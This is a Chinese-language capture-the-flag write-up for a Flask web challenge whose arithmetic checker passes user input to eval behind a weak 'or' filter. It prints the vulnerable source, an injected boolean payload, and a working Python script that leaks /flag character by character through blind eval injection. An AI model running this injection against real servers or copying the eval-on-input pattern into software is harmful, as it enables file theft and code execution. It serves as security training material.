【web】-flask-简单的计算题(不简单)

打开页面是这样的

初步思路,打开F12,查看头,都发现了这个表达式的base64加密字符串。编写脚本提交答案,发现不对;

无奈点开source发现源代码,是flask,初始化表达式,获取提交的表达式,赋值新的表达式,没发现有什么问题,但是eval是个危险函数,前后端没有严格的过滤,这个可以利用,输入:(-497559)+(969608)+(-255632)+(587860)+(716596) and 1==1 后提示Congratulations。source代码和实现代码如下

复制代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        if "or" in string:
            return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question==None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        try:
            calc_result = str((eval(input_question + "=" + str(input))))
            if calc_result == 'True':
                result = "Congratulations"
            elif calc_result == 'False':
                result = "Error"
            else:
                result = "Invalid"
        except:
            result = "Invalid"
        return render_template('index.html', answer=result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)
python 复制代码
import requests
import re

def main():
    alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    url='ip'
    data={"input":""}
    s = requests.Session()
    flag = ''
    for i in range(0,100):
        for char in alphabet:
            try:
                r = s.get(url)
                question = re.search(r"<h4>(.*)</h4>", r.text.decode(), re.M|re.I).group().replace("<h4>", "").replace("</h4>","")[:-1]
                data["input"] = "{0} and '{2}'==(open('/flag','r').read()[{1}])".format(question, i, char)
                r = s.post(url, data=data)
                result = r.content.decode()
                if r"Congratulations" in result:
                    flag += char
                    print(flag)
                    break
            except Exception as e:
                print("Exception: ", end='')
                print(e)
if __name__ == '__main__':
    main()

运行后得到flag : DASCTF{53a6ee70a3e8c013e2b1dbb2b926d3b2}

相关推荐
R-G-B6 分钟前
【P14 3-6 】OpenCV Python——视频加载、摄像头调用、视频基本信息获取(宽、高、帧率、总帧数)
python·opencv·视频加载·摄像头调用·获取视频基本信息·获取视频帧率·获取视频帧数
赵英英俊9 分钟前
Python day46
python·深度学习·机器学习
weixin_307779132 小时前
AWS Lambda解压缩S3 ZIP文件流程
python·算法·云计算·aws
独行soc10 小时前
2025年渗透测试面试题总结-18(题目+回答)
android·python·科技·面试·职场和发展·渗透测试
S01d13r10 小时前
gunicorn + flask 处理高并发请求
python·flask·gunicorn
杜子不疼.10 小时前
《Python列表和元组:从入门到花式操作指南》
开发语言·python
pan0c2310 小时前
数据处理与统计分析 —— numpy入门
python·numpy
max50060011 小时前
基于桥梁三维模型的无人机检测路径规划系统设计与实现
前端·javascript·python·算法·无人机·easyui
秋氘渔11 小时前
综合案例:Python 函数知识整合 — 学生成绩管理系统
开发语言·python
AI 嗯啦12 小时前
SQL详细语法教程(三)mysql的函数知识
android·开发语言·数据库·python·sql·mysql